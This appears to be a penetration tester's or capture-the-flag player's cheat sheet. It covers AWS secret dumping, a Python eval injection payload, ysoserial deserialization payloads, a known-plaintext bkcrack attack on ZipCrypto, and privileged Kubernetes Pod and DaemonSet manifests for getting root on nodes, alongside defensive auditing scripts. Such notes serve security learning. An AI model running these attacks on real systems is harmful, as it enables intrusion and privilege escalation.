
Miscellaneous


Git Repo Analysis

  • git command cheat sheet
    • Check current status: git status
    • Check logs: git log
    • Check logs, one line per commit: git log --oneline
    • Show differences between a specified commit and the previous one: git show <commit>
    • Check differences between the working tree and the last commit: git diff
    • Check differences between two specific commits: git diff <older commit> <newer commit>

AWS

  • General Commands
    • Install the AWS CLI: apt install awscli
    • Configure / connect to an AWS instance: aws configure
      • AWS Access Key ID [None]: <AWS Access Key>
      • AWS Secret Access Key [None]: <AWS Secret Access Key>
      • Default region name [None]: <Default region name>
      • Default output format [None]:
    • Specify an AWS endpoint (if not targeting actual AWS servers): aws <command> --endpoint-url=<url>
      • The awslocal CLI wrapper targets localhost by default
  • Lambda
    • List functions: aws lambda list-functions --endpoint-url=<url>
  • S3
    • Bucket link format: http://s3.[host]/[bucket name]/[file]
    • Get S3 buckets: aws s3api list-buckets
    • Get S3 buckets (alternative): aws s3 ls s3://
    • View an S3 bucket: aws s3 ls s3://<bucket name>
    • Copy a file to an S3 bucket: aws s3 cp <local file> s3://<bucket name>/<file to save>
  • DynamoDB
    • List tables: aws dynamodb list-tables
    • Dump table contents: aws dynamodb scan --table-name <table name>
    • Create a table: aws dynamodb create-table --cli-input-json file://table.json
    • table.json example:

      {
        "TableName": "alerts",
        "KeySchema": [
          { "AttributeName": "title", "KeyType": "HASH" },
          { "AttributeName": "data", "KeyType": "RANGE" }
        ],
        "AttributeDefinitions": [
          { "AttributeName": "title", "AttributeType": "S" },
          { "AttributeName": "data", "AttributeType": "S" }
        ],
        "ProvisionedThroughput": {
          "ReadCapacityUnits": 10,
          "WriteCapacityUnits": 5
        }
      }

    • Add an item to a table: aws dynamodb put-item --cli-input-json file://item.json
    • item.json example:

      {
        "TableName": "alerts",
        "Item": {
          "title": {
            "S": "Ransomware"
          },
          "data": {
            "S": "This is a test"
          }
        }
      }

  • CloudWatch / Logs
    • Get log group names: aws logs describe-log-groups
    • Get log stream information for a log group: awslocal logs describe-log-streams --log-group-name <logGroupName>
  • Secrets Manager
    • List secrets: aws secretsmanager list-secrets
    • Get the value of a secret by its 'Name': aws secretsmanager get-secret-value --secret-id '<secret Name>'
  • Key Management Service (KMS)
    • List keys: aws kms list-keys
    • Get information about a key: aws kms describe-key --key-id <key id>
    • Decrypt a file: aws kms decrypt --ciphertext-blob fileb://<encrypted file> --key-id <key id> --encryption-algorithm <algorithm from describe-key>

SELinux

  • Set the enforcement level (see setenforce -h for usage): setenforce 0|1
  • Easy way to generate allow rules from logged denials: audit2allow -i <input>
    • Example: grep denied /var/log/audit/audit.log | grep read | tail -1 | audit2allow
  • Analyze SELinux denials in the audit log (/var/log/audit/audit.log): audit2why
  • View policy booleans: getsebool -a
  • Set a policy boolean: setsebool <boolean> on|off
  • View port policies: semanage port -l

Python Command Injection

  • Test for injection: enter a math expression such as 2*2. If the math is evaluated then an eval()-based injection vulnerability might exist.
  • Inject commands:
    • eval('__import__("os").system("<command>")')
  • Good resource: https://www.stackhawk.com/blog/command-injection-python/#os-commands

Reading Different File Types

  • File type tools
  • .ost
    • readpst
      • Read the output using evolution
  • SQLite 3
    • sqlite3 <SQLite 3.x db file> .dump
    • sqlitebrowser
  • .exe
    • dnSpy
      • .NET assembly debugger
  • WASM
    • https://github.com/WebAssembly/wabt
      • wasm2wat: convert to readable text
      • wat2wasm: convert back to a wasm file
  • .asar
    • ASAR tool (npm -g install asar)
      • Extract files from an .asar file: asar e <input>.asar main.js
  • .pyc
    • uncompyle6
      • https://pypi.org/project/uncompyle6/2.13.3/

Steganography

  • Steganography: hiding a secret message inside another file (picture, video, message, etc.)
  • Tools
    • steghide
      • Example usage: extract data from an image using a password: steghide extract -sf <File Name> -p <password>
        • extract: extract data
        • -sf <file name>: specify the file to extract from
        • -p: passphrase
      • If the -p flag is not used then we will be prompted for a password.
      • We will be prompted for a password whether the file is protected by one or not.

Port Knocking

  • Linux configuration file: /etc/knockd.conf
  • Port knocking tools
    • knock
    • netcat
      • Example netcat port knocking one-liner: for i in <port #> <port #> <port #>; do nc -nv <ip address> $i; done;
    • nmap

VoIP

  • SIPVicious - pentest tool suite
    • svmap
      • SIP scanner. Scans an IP address space for SIP servers.
    • svwar
      • Scans for working extensions. Also reports whether or not an extension requires authentication.
      • Example usage: scan extensions 1-10000 on 10.129.1.226 using the INVITE method: svwar -e 1-10000 10.129.1.226 -m INVITE
    • svcrack
      • Password cracker using digest authentication. Cracks passwords on both registrar and proxy servers.
    • svreport
      • Manages sessions created by the other tools and exports them to pdf, xml, csv, and plain text.
    • svcrash
      • Responds to svwar and svcrack SIP messages with a message that causes old versions of those tools to crash

HTTP Cookie Flags

  • Set-Cookie syntax:
    Set-Cookie: <name>=<value>[; Max-Age=<age>][; expires=<date>][; domain=<domain_name>][; path=<some_path>][; secure][; HttpOnly]
  • Flag descriptions
    • Expires / Max-Age
      • By default a cookie's lifespan lasts one session, which is traditionally until the browser closes. Modern browsers might hold onto a cookie longer than that.
      • Set the shortest reasonable cookie lifespan for maximum security.
    • Domain
      • By default a cookie will only be shared with the subdomain that it was generated from.
      • The domain flag allows you to change the scope of where the cookie is shared. If the domain is changed from the subdomain to the root domain then every subdomain of that root will have access to the cookie.
    • Path
      • By default a cookie is only shared with the web path that generated it.
      • The path parameter can be used to modify the scope of the web path that has access to the cookie. If the path parameter is set to / (root) then every path on the website will have access to the cookie.
    • Secure
      • By default cookies can be sent over HTTP and HTTPS.
      • The secure flag only allows the cookie to be sent over HTTPS.
    • HttpOnly
      • Makes the cookie inaccessible to client-side scripts. If a browser does not support the HttpOnly flag then the cookie will still be accessible by scripts.
    • SameSite
      • When browsing to a website that pulls resources from other websites, your browser can send any cookies you have for those websites.
      • This flag alters that behavior based on one of its three values: Strict, Lax, and None.
        • Strict: the request must originate from the same site every time.
        • Lax: the request can be cross-site if it is an HTTP GET request and you are navigating to the site itself (a top-level navigation). Cookies will not be sent when a website loads images or other resources from an external site that you have cookies for.
        • None: cookies will always be sent. If None is set then Secure must also be set or the cookie will not be sent.
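A small auditor for the flags described above, written as an added example (not part of the original notes): it parses a Set-Cookie header into its attributes and reports each weakening described in this section, including the SameSite=None-without-Secure case. The 30-day threshold and the finding texts are this example's own assumptions; Expires dates are not parsed.

```python
from dataclasses import dataclass, field

LONG_LIFETIME = 30 * 24 * 3600  # assumed threshold: flag Max-Age above 30 days

@dataclass
class Cookie:
    name: str
    value: str
    attrs: dict = field(default_factory=dict)  # lower-cased attribute names

def parse_set_cookie(header: str) -> Cookie:
    """Parse 'Set-Cookie: name=value; attr=val; flag' (prefix optional)."""
    if header.lower().startswith("set-cookie:"):
        header = header.split(":", 1)[1]
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    if not name.strip():
        raise ValueError("missing cookie name")
    attrs = {}
    for p in parts[1:]:
        if p:
            k, _, v = p.partition("=")      # bare flags (Secure) get value ""
            attrs[k.strip().lower()] = v.strip()
    return Cookie(name.strip(), value, attrs)

def audit_cookie(header: str) -> list:
    """Return human-readable findings; an empty list means nothing to report."""
    a = parse_set_cookie(header).attrs
    findings = []
    if "secure" not in a:
        findings.append("Secure missing: cookie may be sent over plain HTTP")
    if "httponly" not in a:
        findings.append("HttpOnly missing: readable by client-side scripts")
    samesite = a.get("samesite", "").lower()
    if not samesite:
        findings.append("SameSite not set: browser default applies")
    elif samesite == "none" and "secure" not in a:
        findings.append("SameSite=None without Secure: browser rejects cookie")
    if "domain" in a:
        findings.append(f"Domain={a['domain']}: shared with every subdomain")
    if a.get("path") == "/":
        findings.append("Path=/: every path on the site can read it")
    max_age = a.get("max-age", "")
    if max_age.lstrip("-").isdigit() and int(max_age) > LONG_LIFETIME:
        findings.append(f"Max-Age={max_age}: long lifespan, shorten it")
    return findings
```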

Java Deserialization

  • Use ysoserial to generate a malicious Java serialization file.
    • https://github.com/frohoff/ysoserial
      • Download ysoserial-master-SNAPSHOT.jar from the Installation section
  • Syntax: java -jar ysoserial-master-SNAPSHOT.jar <payload type> '<command>'

GitLab

  • Configuration file: /etc/gitlab/gitlab.rb
  • Access the Rails console: gitlab-rails console
  • Console commands:
    • Show active users: User.active
    • Show admins: User.admins
    • Change a user's password:
      <variable> = User.find(<user id #>)
      <variable>.password = '<new password>'
      <variable>.password_confirmation = '<new password>'
      <variable>.save

Zip File Analysis

  • Tools
    • zipdetails
    • 7z
      • List files: 7z l <zip file>
      • List files with technical details: 7z l -slt <zip file>
        • Lists the CRC for each file
        • Lists the encryption method for each file
          • Method = ZipCrypto
            • Vulnerable to a known-plaintext attack
              • Only need to know 10 plaintext characters that exist in the encrypted/zipped file
                • The more plaintext, the quicker the attack
            • Attack steps
              • Zip the plaintext (mirroring text from the encrypted file): zip plaintext.zip plaintext.txt
              • Check the CRC of the zipped plaintext file and make sure it matches the encrypted file: 7z l -slt <zip file>
              • Get the keys for the encrypted file: bkcrack -C <encrypted zip> -c <encrypted target file in zip> -P <plaintext zip> -p <plaintext file from target encrypted file>
              • Change the encrypted zip's password: bkcrack -C <encrypted zip file> -k <keys from previous command> -U <output zip> <new password>

Kubernetes

  • Kubelet - port 10250
    • View running pods: kubeletctl -s <node ip> pods
    • Get a shell on a pod: kubeletctl exec /bin/sh -p <pod name> -n <namespace> -c <container name> -s <node ip>
  • API Server - port 8443
    • Run a command: kubectl --token=$token --certificate-authority=ca.crt --server=https://<server ip>:8443 <command>
    • Token and ca.crt come from the pod's service account directory:
      • /run/secrets/kubernetes.io/serviceaccount
    • The token must be exported to an environment variable for it to work (unconfirmed)
    • Get a list of pods: kubectl --token=$token --certificate-authority=ca.crt --server=https://<server ip>:8443 get pods
    • List permissions: kubectl --token=$token --certificate-authority=ca.crt --server=https://<server ip>:8443 auth can-i --list
      • If permitted to create a pod, then create one with the host file system mounted inside
        • https://raesene.github.io/blog/2019/04/01/The-most-pointless-kubernetes-command-ever/
        • Create noderoot.yml:

          apiVersion: v1
          kind: Pod
          metadata:
            name: noderootpod
            labels:
          spec:
            hostNetwork: true
            hostPID: true
            hostIPC: true
            containers:
            - name: noderootpod
              image: busybox  # or another valid known image, e.g. one used by a pre-existing pod
              securityContext:
                privileged: true
              volumeMounts:
              - mountPath: /host
                name: noderoot
              command: [ "/bin/sh", "-c", "--" ]
              args: [ "while true; do sleep 30; done;" ]
            volumes:
            - name: noderoot
              hostPath:
                path: /

        • Create the new pod: kubectl create -f noderoot.yml
        • Get a shell on the new pod: kubectl exec -it noderootpod chroot /host
          • If unable to exec on the new pod using kubectl, then try kubeletctl to access it
        • To gain root on all nodes in a cluster, use a DaemonSet instead:

          apiVersion: apps/v1
          kind: DaemonSet
          metadata:
            name: noderootpod
            labels:
          spec:
            selector:
              matchLabels:
                name: noderootdaemon
            template:
              metadata:
                labels:
                  name: noderootdaemon
              spec:
                tolerations:
                - key: node-role.kubernetes.io/master
                  effect: NoSchedule
                hostNetwork: true
                hostPID: true
                hostIPC: true
                containers:
                - name: noderootpod
                  image: busybox  # or another valid known image, e.g. one used by a pre-existing pod
                  securityContext:
                    privileged: true
                  volumeMounts:
                  - mountPath: /host
                    name: noderoot
                  command: [ "/bin/sh", "-c", "--" ]
                  args: [ "while true; do sleep 30; done;" ]
                volumes:
                - name: noderoot
                  hostPath:
                    path: /

          • Get root on a chosen pod
            • Get a shell on a pod: kubectl exec -it <chosen pod from "kubectl get po" output> chroot /host
              • If unable to exec on the new pod using kubectl, then try kubeletctl to access it
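The noderoot manifests above are recognisable by a handful of PodSpec fields: the three host namespaces, privileged: true, and a hostPath volume for /. This added example (not from the original notes or the linked blog) audits a Pod or DaemonSet manifest, already loaded into a dict as yaml.safe_load would produce, for exactly those settings; the function names, finding texts and the constructed NODEROOT_POD sample are this example's own.

```python
HOST_NAMESPACES = ("hostNetwork", "hostPID", "hostIPC")

def pod_spec_of(manifest: dict) -> dict:
    """Return the PodSpec for a bare Pod or for a workload with a pod template."""
    kind = manifest.get("kind")
    if kind == "Pod":
        return manifest.get("spec", {})
    if kind in ("DaemonSet", "Deployment", "StatefulSet", "Job"):
        return manifest.get("spec", {}).get("template", {}).get("spec", {})
    raise ValueError(f"unsupported kind: {kind}")

def audit_manifest(manifest: dict) -> list:
    """List the node-escape settings present; empty list when none are found."""
    spec = pod_spec_of(manifest)
    name = manifest.get("metadata", {}).get("name", "<unnamed>")
    findings = []
    for ns in HOST_NAMESPACES:
        if spec.get(ns) is True:
            findings.append(f"{name}: {ns}=true shares the node's namespace")
    for c in spec.get("containers", []) + spec.get("initContainers", []):
        sc = c.get("securityContext") or {}
        if sc.get("privileged") is True:
            findings.append(f"{name}/{c.get('name')}: privileged container")
    for v in spec.get("volumes", []):
        host_path = v.get("hostPath")
        if host_path:
            path = host_path.get("path", "")
            what = "the whole node filesystem" if path == "/" else "a host path"
            findings.append(f"{name}: hostPath {path} mounts {what}")
    return findings

# Constructed sample mirroring the noderoot.yml pod from the notes above.
NODEROOT_POD = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "noderootpod"},
    "spec": {
        "hostNetwork": True, "hostPID": True, "hostIPC": True,
        "containers": [{
            "name": "noderootpod", "image": "busybox",
            "securityContext": {"privileged": True},
            "volumeMounts": [{"mountPath": "/host", "name": "noderoot"}],
        }],
        "volumes": [{"name": "noderoot", "hostPath": {"path": "/"}}],
    },
}
```

The same checks are what an admission policy (Pod Security Standards "restricted" profile or a custom webhook) would block; running them over manifests in CI catches the pattern before it reaches a cluster.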

Unprotect Excel Document

  • Open the Excel file with 7-Zip (an .xlsx file is a zip archive)
  • Find the worksheet that is protected (under xl/worksheets)
  • Remove the full "sheetProtection" tag